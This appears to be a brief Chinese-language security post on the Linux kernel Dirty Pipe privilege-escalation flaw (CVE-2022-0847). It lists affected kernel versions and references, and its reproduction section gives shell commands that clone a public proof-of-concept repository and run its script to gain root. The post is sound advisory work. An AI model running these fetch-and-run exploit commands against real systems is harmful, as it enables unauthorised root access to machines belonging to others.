漏洞简介

由于 Linux 内核中 copy_page_to_iter_pipepush_pipe 函数的正确初始化存在缺陷,攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而将普通用户权限提升至 root 权限。因原理与CVE-2016-5195 脏牛漏洞(Dirty Cow)类似,作者将此漏洞命名为“Dirty Pipe”。

影响范围

受影响版本
  • 5.8 <= Linux kernel < 5.16.11
  • 5.8 <= Linux kernel < 5.15.25
  • 5.8 <= Linux kernel < 5.10.102
不受影响版本
  • Linux kernel = 5.16.11
  • Linux kernel = 5.15.25
  • Linux kernel = 5.10.102

漏洞复现

POC下载地址:https://github.com/imfiver/CVE-2022-0847

使用方式:

1
2
3
4
5
6
7
git clone https://github.com/imfiver/CVE-2022-0847.git

cd CVE-2022-0847

chmod +x Dirty-Pipe.sh

bash Dirty-Pipe.sh

img

复现成功

参考链接

1、https://dirtypipe.cm4all.com/

2、https://access.redhat.com/security/cve/cve-2022-0847

3、https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9d2231c5d74e13b2a0546fee6737ee4446017903